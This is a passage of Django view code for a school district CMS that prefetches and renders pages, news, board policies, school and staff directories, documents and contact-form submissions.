'directoryentries_schooladministration_node', queryset=prefetchqs, ) ) def prefetch_schoolstaff_detail(qs): prefetchqs = ( SchoolStaff .objects .filter(deleted=0) .filter(published=1) .filter(employee__is_active=True) .filter(employee__is_staff=True) .order_by('inline_order') .prefetch_related( Prefetch( 'employee', queryset=( Employee .objects .filter(is_active=True) .filter(is_staff=True) .only( 'pk', 'last_name', 'first_name', 'email', 'job_title', ) ) ) ) ) return qs.prefetch_related( Prefetch( 'directoryentries_schoolstaff_node', queryset=prefetchqs, ) ) def prefetch_schoolfaculty_detail(qs): prefetchqs = ( SchoolFaculty .objects .filter(deleted=0) .filter(published=1) .filter(employee__is_active=True) .filter(employee__is_staff=True) .prefetch_related( Prefetch( 'employee', queryset=( Employee .objects .filter(is_active=True) .filter(is_staff=True) .only( 'pk', 'last_name', 'first_name', 'email', 'job_title', ) ) ) ) .order_by( 'employee__first_name', 'employee__last_name', ) ) return qs.prefetch_related( Prefetch( 'directoryentries_schoolfaculty_node', queryset=prefetchqs, ) ) def prefetch_subpage_detail(qs): prefetchqs = ( SubPage .objects .filter(deleted=0) .filter(published=1) .only( 'title', 'url', 'inline_order', 'related_node_id', ) ) return qs.prefetch_related( Prefetch( 'pages_subpage_node', queryset=prefetchqs, ) ) def add_additional_context(request, context, node): if request.path == '/' or request.path == '/home/': context['supermessage'] = ( SuperintendentMessage .objects .filter(deleted=0) .filter(published=1) .order_by('-author_date') .only( 'title', 'author_date', 'summary', 'url', )[:1] ) context['news'] = ( News .objects .filter(deleted=0) .filter(published=1) .order_by( '-pinned', '-author_date', ) .only( 'title', 'author_date', 'summary', 'url', ) .prefetch_related( Prefetch( 'images_newsthumbnail_node', queryset=( NewsThumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) )[0:5] ) if request.path == 
'/departments/department-structure/': context['departments'] = ( prefetch_building_location_detail( Department .objects .filter(deleted=0) .filter(published=1) .order_by('lft') ) ) if request.path == '/board-of-education/policies/': district_policies = ( BoardPolicy .objects .filter(deleted=0) .filter(published=1) .order_by('section__lft','index') .only('pk','policy_title','index','section','related_node') .prefetch_related( Prefetch('section', queryset= BoardPolicySection.objects.filter(deleted=0).filter(published=1).only('pk','section_prefix','description')),Prefetch('directoryentries_boardpolicyadmin_node',queryset=BoardPolicyAdmin.objects.filter(deleted=0).filter(published=1).order_by('title').only('pk','employee','related_node').prefetch_related(Prefetch('employee',queryset=Employee.objects.filter(is_active=1).filter(is_staff=1).only('pk','last_name','first_name')))),Prefetch('documents_policy_node', queryset = Policy.objects.filter(deleted=0).filter(published=1).only('pk','related_node').prefetch_related(Prefetch('files_file_node', queryset = File.objects.filter(deleted=0).filter(published=1).order_by('file_language__lft','file_language__title').only('title','file_file','file_language','related_node').prefetch_related(Prefetch('file_language',queryset=Language.objects.filter(deleted=0).filter(published=1).only('title')))))),Prefetch('documents_administrativeprocedure_node', queryset = AdministrativeProcedure.objects.filter(deleted=0).filter(published=1).only('pk','related_node').prefetch_related(Prefetch('files_file_node', queryset = File.objects.filter(deleted=0).filter(published=1).order_by('file_language__lft','file_language__title').only('title','file_file','file_language','related_node').prefetch_related(Prefetch('file_language',queryset=Language.objects.filter(deleted=0).filter(published=1).only('title')))))),Prefetch('documents_supportingdocument_node', queryset = 
SupportingDocument.objects.filter(deleted=0).filter(published=1).only('pk','document_title','related_node').prefetch_related(Prefetch('files_file_node', queryset = File.objects.filter(deleted=0).filter(published=1).order_by('file_language__lft','file_language__title').only('title','file_file','file_language','related_node').prefetch_related(Prefetch('file_language',queryset=Language.objects.filter(deleted=0).filter(published=1).only('title'))))))) ) board_policies = [] community_policies = [] financial_policies = [] general_policies = [] instructional_policies = [] personnel_policies = [] student_policies = [] for policy in district_policies: if policy.section.title == 'Board Policies': board_policies.append(policy) if policy.section.title == 'Community Policies': community_policies.append(policy) if policy.section.title == 'Financial Policies': financial_policies.append(policy) if policy.section.title == 'General Policies': general_policies.append(policy) if policy.section.title == 'Instructional Policies': instructional_policies.append(policy) if policy.section.title == 'Personnel Policies': personnel_policies.append(policy) if policy.section.title == 'Student Policies': student_policies.append(policy) context['board_policies'] = board_policies context['community_policies'] = community_policies context['financial_policies'] = financial_policies context['general_policies'] = general_policies context['instructional_policies'] = instructional_policies context['personnel_policies'] = personnel_policies context['student_policies'] = student_policies if request.path == '/board-of-education/policies/policy-review-schedule/': context['policy_review'] = OrderedDict() policy_review = ( BoardPolicy .objects .filter(deleted=0) .filter(published=1) .exclude(subcommittee_review=None) .exclude(boardmeeting_review=None) .order_by( 'subcommittee_review', 'section__lft', 'index') .only( 'pk', 'policy_title', 'index', 'section', 'subcommittee_review', 'boardmeeting_review', 
'last_approved', 'related_node', ) .prefetch_related( Prefetch( 'section', queryset=( BoardPolicySection .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'section_prefix', ) ) ) ) ) for policy in policy_review: strdate = '{0}{1}'.format( policy.subcommittee_review.strftime('%Y%m%d'), policy.boardmeeting_review.strftime('%Y%m%d'), ) if strdate not in context['policy_review']: context['policy_review'][strdate] = {} context['policy_review'][strdate]['subcommittee_review'] = ( policy.subcommittee_review.strftime('%m/%d/%Y') ) context['policy_review'][strdate]['boardmeeting_review'] = ( policy.boardmeeting_review.strftime('%m/%d/%Y') ) context['policy_review'][strdate]['policies'] = [] context['policy_review'][strdate]['policies'].append(policy) if node.content_type == 'newsyear': context['newsyears'] = NewsYear.objects.all().order_by('-yearend') context['news'] = ( News. objects .filter(parent__url=request.path) .filter(deleted=0) .filter(published=1) .only( 'title', 'author_date', 'summary', 'url', ) .prefetch_related( Prefetch( 'images_newsthumbnail_node', queryset=( NewsThumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) newsmonths = [ {'month': 'June', 'news': [], }, {'month': 'May', 'news': [], }, {'month': 'April', 'news': [], }, {'month': 'March', 'news': [], }, {'month': 'February', 'news': [], }, {'month': 'January', 'news': [], }, {'month': 'December', 'news': [], }, {'month': 'November', 'news': [], }, {'month': 'October', 'news': [], }, {'month': 'September', 'news': [], }, {'month': 'August', 'news': [], }, {'month': 'July', 'news': [], }, ] for item in context['news']: if item.author_date.month == 6: newsmonths[0]['news'].append(item) if item.author_date.month == 5: newsmonths[1]['news'].append(item) if item.author_date.month == 4: newsmonths[2]['news'].append(item) if item.author_date.month == 3: newsmonths[3]['news'].append(item) if item.author_date.month == 2: newsmonths[4]['news'].append(item) if 
item.author_date.month == 1: newsmonths[5]['news'].append(item) if item.author_date.month == 12: newsmonths[6]['news'].append(item) if item.author_date.month == 11: newsmonths[7]['news'].append(item) if item.author_date.month == 10: newsmonths[8]['news'].append(item) if item.author_date.month == 9: newsmonths[9]['news'].append(item) if item.author_date.month == 8: newsmonths[10]['news'].append(item) if item.author_date.month == 7: newsmonths[11]['news'].append(item) context['newsmonths'] = newsmonths if request.path == '/schools/' or request.path == '/schools/school-registration-dates/': schools = ( School .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'pk', 'title', 'school_number', 'building_location', 'schooltype', 'schooloptions', 'website_url', 'scc_url', 'calendar_url', 'donate_url', 'boundary_map', 'url', 'main_phone', ) .prefetch_related( Prefetch( 'schooltype', queryset=( SchoolType .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'schooloptions', queryset=( SchoolOption .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'building_location', queryset=( Location .objects .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .only('title') ) ) ) ) ), Prefetch( 'images_thumbnail_node', queryset=( Thumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) context['elementary_schools_directory'] = [] context['k8_schools_directory'] = [] context['middle_schools_directory'] = [] context['high_schools_directory'] = [] context['charter_schools_directory'] = [] context['community_learning_centers_directory'] = [] for school in schools: if school.schooltype.title == 'Elementary 
Schools': context['elementary_schools_directory'].append(school) if school.schooltype.title == 'K-8 Schools': context['k8_schools_directory'].append(school) if school.schooltype.title == 'Middle Schools': context['middle_schools_directory'].append(school) if school.schooltype.title == 'High Schools': context['high_schools_directory'].append(school) if school.schooltype.title == 'Charter Schools': context['charter_schools_directory'].append(school) if school.schooltype.title == 'Community Learning Centers': context['community_learning_centers_directory'].append(school) context['learningoptions'] = SchoolOption.objects.filter(deleted=0).filter(published=1).order_by('title') context['school_reg_dates'] = cache.get_or_set('school_reg_dates', updates_school_reg_dates(), 120) if request.path == '/schools/elementary-schools/': schools = ( School .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'pk', 'title', 'building_location', 'schooltype', 'schooloptions', 'website_url', 'scc_url', 'calendar_url', 'donate_url', 'boundary_map', 'url', 'main_phone', ) .prefetch_related( Prefetch( 'schooltype', queryset=( SchoolType .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'schooloptions', queryset=( SchoolOption .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'building_location', queryset=( Location .objects .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .only('title') ) ) ) ) ), Prefetch( 'images_thumbnail_node', queryset=( Thumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) context['schools'] = [] for school in schools: if school.schooltype.title == 'Elementary Schools': 
context['schools'].append(school) context['learningoptions'] = SchoolOption.objects.filter(deleted=0).filter(published=1).order_by('title') if request.path == '/schools/k-8-schools/': schools = ( School .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'pk', 'title', 'building_location', 'schooltype', 'schooloptions', 'website_url', 'scc_url', 'calendar_url', 'donate_url', 'boundary_map', 'url', 'main_phone', ) .prefetch_related( Prefetch( 'schooltype', queryset=( SchoolType .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'schooloptions', queryset=( SchoolOption .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'building_location', queryset=( Location .objects .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .only('title') ) ) ) ) ), Prefetch( 'images_thumbnail_node', queryset=( Thumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) context['schools'] = [] for school in schools: if school.schooltype.title == 'K-8 Schools': context['schools'].append(school) context['learningoptions'] = SchoolOption.objects.filter(deleted=0).filter(published=1).order_by('title') if request.path == '/schools/middle-schools/': schools = ( School .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'pk', 'title', 'building_location', 'schooltype', 'schooloptions', 'website_url', 'scc_url', 'calendar_url', 'donate_url', 'boundary_map', 'url', 'main_phone', ) .prefetch_related( Prefetch( 'schooltype', queryset=( SchoolType .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'schooloptions', queryset=( SchoolOption .objects 
.filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'building_location', queryset=( Location .objects .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .only('title') ) ) ) ) ), Prefetch( 'images_thumbnail_node', queryset=( Thumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) context['schools'] = [] for school in schools: if school.schooltype.title == 'Middle Schools': context['schools'].append(school) context['learningoptions'] = SchoolOption.objects.filter(deleted=0).filter(published=1).order_by('title') if request.path == '/schools/high-schools/': schools = ( School .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'pk', 'title', 'building_location', 'schooltype', 'schooloptions', 'website_url', 'scc_url', 'calendar_url', 'donate_url', 'boundary_map', 'url', 'main_phone', ) .prefetch_related( Prefetch( 'schooltype', queryset=( SchoolType .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'schooloptions', queryset=( SchoolOption .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'building_location', queryset=( Location .objects .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .only('title') ) ) ) ) ), Prefetch( 'images_thumbnail_node', queryset=( Thumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) context['schools'] = [] for school in schools: if 
school.schooltype.title == 'High Schools': context['schools'].append(school) context['learningoptions'] = SchoolOption.objects.filter(deleted=0).filter(published=1).order_by('title') if request.path == '/schools/charter-schools/': schools = ( School .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'pk', 'title', 'building_location', 'schooltype', 'schooloptions', 'website_url', 'scc_url', 'calendar_url', 'donate_url', 'boundary_map', 'url', 'main_phone', ) .prefetch_related( Prefetch( 'schooltype', queryset=( SchoolType .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'schooloptions', queryset=( SchoolOption .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'building_location', queryset=( Location .objects .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .only('title') ) ) ) ) ), Prefetch( 'images_thumbnail_node', queryset=( Thumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) context['schools'] = [] for school in schools: if school.schooltype.title == 'Charter Schools': context['schools'].append(school) context['learningoptions'] = SchoolOption.objects.filter(deleted=0).filter(published=1).order_by('title') if request.path == '/schools/community-learning-centers/': schools = ( School .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'pk', 'title', 'building_location', 'schooltype', 'schooloptions', 'website_url', 'scc_url', 'calendar_url', 'donate_url', 'boundary_map', 'url', 'main_phone', ) .prefetch_related( Prefetch( 'schooltype', queryset=( SchoolType .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 
'schooloptions', queryset=( SchoolOption .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'building_location', queryset=( Location .objects .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .only('title') ) ) ) ) ), Prefetch( 'images_thumbnail_node', queryset=( Thumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) context['schools'] = [] for school in schools: if school.schooltype.title == 'Community Learning Centers': context['schools'].append(school) context['learningoptions'] = SchoolOption.objects.filter(deleted=0).filter(published=1).order_by('title') if request.path == '/departments/': all_departments = ( Department .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'title', 'building_location', 'url', 'main_phone', 'short_description', 'is_department', ) .prefetch_related( Prefetch( 'building_location', queryset=( Location .objects .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .only('title') ) ) ) ) ) ) ) departments = { 'departments': [], 'programs': [], } for department in all_departments: if department.is_department: departments['departments'].append(department) else: departments['programs'].append(department) context['departments'] = departments if node.content_type == 'superintendentmessageyear': context['messageyears'] = SuperintendentMessageYear.objects.all().order_by('-yearend') context['superintendent_messages'] = ( 
SuperintendentMessage .objects .filter(parent__url=request.path) .filter(deleted=0) .filter(published=1) .only( 'title', 'author_date', 'summary', 'url', ) .prefetch_related( Prefetch( 'images_newsthumbnail_node', queryset=( NewsThumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) messagemonths = [ {'month': 'June', 'message': [], }, {'month': 'May', 'message': [], }, {'month': 'April', 'message': [], }, {'month': 'March', 'message': [], }, {'month': 'February', 'message': [], }, {'month': 'January', 'message': [], }, {'month': 'December', 'message': [], }, {'month': 'November', 'message': [], }, {'month': 'October', 'message': [], }, {'month': 'September', 'message': [], }, {'month': 'August', 'message': [], }, {'month': 'July', 'message': [], }, ] for item in context['superintendent_messages']: if item.author_date.month == 6: messagemonths[0]['message'].append(item) if item.author_date.month == 5: messagemonths[1]['message'].append(item) if item.author_date.month == 4: messagemonths[2]['message'].append(item) if item.author_date.month == 3: messagemonths[3]['message'].append(item) if item.author_date.month == 2: messagemonths[4]['message'].append(item) if item.author_date.month == 1: messagemonths[5]['message'].append(item) if item.author_date.month == 12: messagemonths[6]['message'].append(item) if item.author_date.month == 11: messagemonths[7]['message'].append(item) if item.author_date.month == 10: messagemonths[8]['message'].append(item) if item.author_date.month == 9: messagemonths[9]['message'].append(item) if item.author_date.month == 8: messagemonths[10]['message'].append(item) if item.author_date.month == 7: messagemonths[11]['message'].append(item) context['messagemonths'] = messagemonths if request.path == '/departments/communications-and-community-relations/district-logo/': all_logos = DistrictLogo.objects.filter(deleted=0).filter(published=1).order_by('district_logo_group__lft','district_logo_style_variation__lft') 
districtlogos = { 'primary':[], 'primaryrev':[], 'secondary':[], 'secondaryrev':[], 'wordmark':[], } for logo in all_logos: if logo.district_logo_group.title == 'Primary Logo': districtlogos['primary'].append(logo) if logo.district_logo_group.title == 'Primary Logo Reversed': districtlogos['primaryrev'].append(logo) if logo.district_logo_group.title == 'Secondary Logo': districtlogos['secondary'].append(logo) if logo.district_logo_group.title == 'Secondary Logo Reversed': districtlogos['secondaryrev'].append(logo) if logo.district_logo_group.title == 'Wordmark': districtlogos['wordmark'].append(logo) context['districtlogos'] = districtlogos if node.content_type == 'department': context['department_children'] = ( Department .objects .filter(deleted=0) .filter(published=1) .filter(parent__url=request.path) .order_by('title') .only( 'pk', 'title', 'short_description', 'main_phone', 'building_location', 'content_type', 'menu_title', 'url', ) .prefetch_related( Prefetch( 'building_location', queryset=( Location .objects .filter(deleted=0) .filter(published=1) .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .filter(deleted=0) .filter(published=1) .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .filter(deleted=0) .filter(published=1) .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) if request.path == '/directory/': context['people'] = ( Employee .objects .filter(is_active=1) .filter(is_staff=1) .filter(in_directory=1) .order_by('last_name') .only( 'pk', 'last_name', 'first_name', 'job_title', 'email', 'department', ) .prefetch_related( Prefetch( 'department', queryset=( Node .objects .only( 'node_title', 'url', ) ) ) ) ) if request.path.startswith('/directory/last-name-'): letter = request.path[-2] context['people'] = ( Employee 
        .objects
        .filter(is_active=1)
        .filter(is_staff=1)
        .filter(in_directory=1)
        .filter(last_name__istartswith=letter)
        .order_by('last_name')
        .only(
            'pk',
            'last_name',
            'first_name',
            'job_title',
            'email',
            'department',
        )
        .prefetch_related(
            Prefetch(
                'department',
                queryset=(
                    Node
                    .objects
                    .only(
                        'node_title',
                        'url',
                    )
                )
            )
        )
    )
    # District-calendar year node: every year (newest first) plus the events
    # filed under the year currently being viewed.
    if node.content_type == 'districtcalendaryear':
        context['districtcalendaryears'] = (
            DistrictCalendarYear
            .objects
            .filter(deleted=0)
            .filter(published=1)
            .order_by('-yearend')
        )
        context['districtcalendarevents'] = (
            DistrictCalendarEvent
            .objects
            .filter(deleted=0)
            .filter(published=1)
            .filter(parent__url=request.path)
        )
    # Board-meeting year node: every year plus this year's meetings,
    # most recent meeting first.
    if node.content_type == 'boardmeetingyear':
        context['board_meeting_years'] = (
            BoardMeetingYear
            .objects
            .filter(deleted=0)
            .filter(published=1)
            .order_by('-yearend')
        )
        context['board_meetings'] = (
            BoardMeeting
            .objects
            .filter(deleted=0)
            .filter(published=1)
            .filter(parent__url=request.path)
            .order_by('-startdate')
        )
    # Contact pages rendered via GET get an empty form; POSTs are handled
    # by process_post()/contactmessage_post() instead.
    if (
        request.method != 'POST' and
        (
            request.path == '/contact-us/' or
            request.path == '/contact-us/inline/'
        )
    ):
        context['form'] = contactmessage_get(request)
        context['from_page'] = (
            commonfunctions
            .nodefindobject(
                Node.objects
                .get(pk=context['form'].fields['parent'].initial)
            )
        )
    # "In this section" navigation: child pages of the nearest ancestor using
    # the site-section layout.  .first() may return None, in which case the
    # chained .get_children() raises AttributeError, which is swallowed below.
    try:
        context['in_this_section'] = (
            node
            .get_ancestors(ascending=True)
            .filter(
                deleted=0,
                published=1,
                pagelayout__namespace='site-section.html'
            ).first()
            .get_children()
            .filter(
                node_type='pages',
                content_type='page',
                published=1,
                deleted=0,
            )
            .order_by('page__page__inline_order')
        )
        # Non-admins only see pages that actually have visible content.
        if not commonfunctions.is_siteadmin(request):
            context['in_this_section'] = context['in_this_section'].filter(section_page_count__gte=1)
    except AttributeError:
        pass
    return context


def process_post(request):
    """Dispatch a contact-form POST.

    Returns the URL to redirect to after a contact-us submission; falls
    through (returning None) for any other request.
    """
    if (
        request.method == 'POST' and
        (
            request.path == '/contact-us/' or
            request.path == '/contact-us/inline/'
        )
    ):
        post = contactmessage_post(request)
        return post.parent.url


def contactmessage_post(request):
    """Validate and persist a submitted contact message; returns it."""
    form = ContactMessageForm(request.POST)
    if
form.is_valid(): if request.user.is_anonymous: user = User.objects.get(username='AnonymousUser') else: user = User.objects.get(pk=request.user.pk) post = form.save(commit=False) message_parent = Node.objects.get(pk=post.parent.pk) if post.primary_contact == '': if message_parent.primary_contact: post.primary_contact = message_parent.primary_contact else: post.primary_contact = request.site.dashboard_general_site.primary_contact post.create_user = user post.update_user = user post.site = request.site post.searchable = False post.remote_addr = request.META['HTTP_X_FORWARDED_FOR'] post.user_agent = request.META['HTTP_USER_AGENT'] post.http_headers = json.dumps(request.META, default=str) if not post.our_message: post.save() messages.success( request, 'Thank you for contacting us. ' 'Someone will get back to you shortly.') else: messages.error( request, 'Something was wrong with your message. Please try again.') return post def contactmessage_get(request): form = ContactMessageForm() try: if request.GET['pid']: form.fields['parent'].initial = request.GET['pid'] except: form.fields['parent'].initial = commonfunctions.get_contactpage(request) try: if request.GET['cid']: form.fields['primary_contact'].initial = request.GET['cid'] except: try: form.fields['primary_contact'].initial = str(Node.objects.get(pk=form.fields['parent'].initial).primary_contact.pk) except: try: form.fields['primary_contact'].initial = str(request.site.dashboard_general_site.primary_contact.pk) except: form.fields['primary_contact'].initial = str(User.objects.get(username='webmaster@slcschools.org').pk) try: message_to = User.objects.get( pk=form.fields['primary_contact'].initial ) except User.DoesNotExist: message_to = User.objects.get( username='webmaster@slcschools.org', ) form.fields['message_to'].initial = '{0} {1}'.format( message_to.first_name, message_to.last_name, ) form.fields['message_to'].disabled = True return form # def contact(request): # template = 
'cmstemplates/www_slcschools_org/pagelayouts/contact-us.html' # context = {} # context['page'] = get_object_or_404(Page, url=request.path) # context['pageopts'] = context['page']._meta # if request.method == "POST": # post = contactmessage_post(request) # return redirect(post.parent.url) # else: # context['form'] = contactmessage_get(request) # context['from_page'] = commonfunctions.nodefindobject(Node.objects.get(pk=context['form'].fields['parent'].initial)) # return render(request, template, context) # def contact_inline(request): # template = 'cmstemplates/www_slcschools_org/blocks/contact-us-inline.html' # context = {} # context['page'] = get_object_or_404(Page, url=request.path) # context['pageopts'] = context['page']._meta # if request.method == "POST": # post = contactmessage_post(request) # return redirect(post.parent.url) # else: # context['form'] = contactmessage_get(request) # context['from_page'] = commonfunctions.nodefindobject(Node.objects.get(pk=context['form'].fields['parent'].initial)) # return render(request, template, context)


def _published_files_prefetch():
    """Prefetch spec for a node's published files, ordered by language,
    with each file's published language preloaded."""
    return Prefetch(
        'files_file_node',
        queryset=(
            File
            .objects
            .filter(deleted=0)
            .filter(published=1)
            .order_by(
                'file_language__lft',
                'file_language__title',
            )
            .only(
                'title',
                'file_file',
                'file_language',
                'related_node',
            )
            .prefetch_related(
                Prefetch(
                    'file_language',
                    queryset=(
                        Language
                        .objects
                        .filter(deleted=0)
                        .filter(published=1)
                        .only('title')
                    )
                )
            )
        )
    )


def _render_file_listing(request, node, Model):
    """Render a node whose detail page is a listing of its attached files.

    When exactly one published file is attached, redirect straight to the
    file instead of rendering the listing page.
    """
    item = (
        Model
        .objects
        .filter(pk=node.pk)
        .prefetch_related(_published_files_prefetch())
        .first()
    )
    if item.files_file_node.all().count() == 1:
        return redirect(item.files_file_node.first().url)
    template = set_template(request, node)
    context = {}
    context['page'] = item
    context['pageopts'] = item._meta
    return render(request, template, context)


def _render_media_listing(request, node, Model, relation, media_model):
    """Render a node that lists attached media files (audio or video)."""
    item = (
        Model
        .objects
        .filter(pk=node.pk)
        .prefetch_related(
            Prefetch(
                relation,
                queryset=(
                    media_model
                    .objects
                    .filter(deleted=0)
                    .filter(published=1)
                    .only(
                        'title',
                        'file_file',
                        'related_node',
                    )
                )
            )
        )
        .first()
    )
    template = set_template(request, node)
    context = {}
    context['page'] = item
    context['pageopts'] = item._meta
    return render(request, template, context)


def _serve_stored_file(item, stored_file):
    """Hand a stored file off to the front-end server via X-Accel-Redirect
    instead of streaming it through Django."""
    response = HttpResponse()
    response['Content-Type'] = ''
    response['X-Accel-Redirect'] = stored_file.url
    response['Content-Disposition'] = 'filename={0}'.format(item.file_name())
    return response


def _attach_section_context(context):
    """Attach the nearest published 'site-section' ancestor, if any."""
    context['section'] = context['page'].get_ancestors(ascending=True).filter(
        deleted=0,
        published=1,
        pagelayout__namespace='site-section.html'
    ).first()
    if context['section']:
        context['section'] = commonfunctions.nodefindobject(context['section'])
        context['sectionopts'] = context['section']._meta
    return context


def _render_page(request, node, Model):
    """Render a standard CMS page with all related content prefetched."""
    if request.method == 'POST':
        return redirect(process_post(request))
    template = set_template(request, node)
    context = {}
    context['page'] = (Model
                       .objects
                       .filter(pk=node.pk)
                       )
    # BUGFIX: _meta.get_fields() returns Field objects, so the original test
    # `'building_location' in fields` compared a string against Field
    # instances and was always False. Compare against the field *names*.
    field_names = {
        f.name for f in context['page'].model._meta.get_fields(include_hidden=True)
    }
    if 'building_location' in field_names:
        context['page'] = prefetch_building_location_detail(context['page'])
    # Same prefetch chain as before, applied in the same order.
    for prefetch in (
        prefetch_contentbanner_detail,
        prefetch_actionbuttons_detail,
        prefetch_boardmembers_detail,
        prefetch_studentboardmember_detail,
        prefetch_schooladministrators_detail,
        prefetch_administrators_detail,
        prefetch_staff_detail,
        prefetch_resourcelinks_detail,
        prefetch_documents_detail,
        prefetch_disclosuredocuments_detail,
        prefetch_subpage_detail,
        prefetch_announcement_detail,
        prefetch_schooladministration_detail,
        prefetch_schoolstaff_detail,
        prefetch_schoolfaculty_detail,
        prefetch_subjectgradelevel_detail,
        prefetch_schoolcommunitycouncilmeetings_detail,
        prefetch_schoolcommunitycouncilmembers_detail,
    ):
        context['page'] = prefetch(context['page'])
    # Add additional context here
    context = add_additional_context(request, context, node)
    # Change Queryset into object
    context['page'] = context['page'].first()
    context['pageopts'] = context['page']._meta
    context = _attach_section_context(context)
    return render(request, template, context)


# Document content types whose detail view is just a listing of attached files.
_FILE_LISTING_DOCUMENT_TYPES = (
    'document',
    'policy',
    'administrativeprocedure',
    'supportingdocument',
    'boardmeetingagenda',
    'boardmeetingminutes',
)


def _render_document(request, node, Model):
    """Dispatch a 'documents' node on its content type."""
    if node.content_type in _FILE_LISTING_DOCUMENT_TYPES:
        return _render_file_listing(request, node, Model)
    if node.content_type == 'boardmeetingaudio':
        return _render_media_listing(
            request, node, Model, 'files_audiofile_node', AudioFile)
    if node.content_type == 'boardmeetingvideo':
        return _render_media_listing(
            request, node, Model, 'files_videofile_node', VideoFile)
    if node.content_type in (
        'boardpolicy',
        'boardmeetingexhibit',
        'boardmeetingagendaitem',
    ):
        # Container entries with no page of their own.
        return HttpResponse(status=200)
    # Unknown document content type (matches the old fall-through behavior).
    return HttpResponse(status=404)


def _render_schoolfaculty(request, node, Model):
    """Render a school-faculty directory entry."""
    template = set_template(request, node)
    context = {}
    context['page'] = (
        Model
        .objects
        .filter(deleted=0)
        .filter(published=1)
        .filter(pk=node.pk)
    )
    context['page'] = prefetch_disclosuredocuments_detail(context['page'])
    context['page'] = prefetch_classwebsite_detail(context['page'])
    context = add_additional_context(request, context, node)
    context['page'] = context['page'].first()
    context['pageopts'] = context['page']._meta
    context = _attach_section_context(context)
    return render(request, template, context)


# Page layouts whose detail view is just a listing of attached files.
_FILE_LISTING_LAYOUTS = (
    'disclosure-document.html',
    'school-community-council-meeting-agenda.html',
    'school-community-council-meeting-minutes.html',
)


def node_lookup(request):
    """Resolve ``request.path`` to a Node and dispatch to the appropriate
    response: a redirect, a rendered template, a proxied file download, or
    a bare status code.

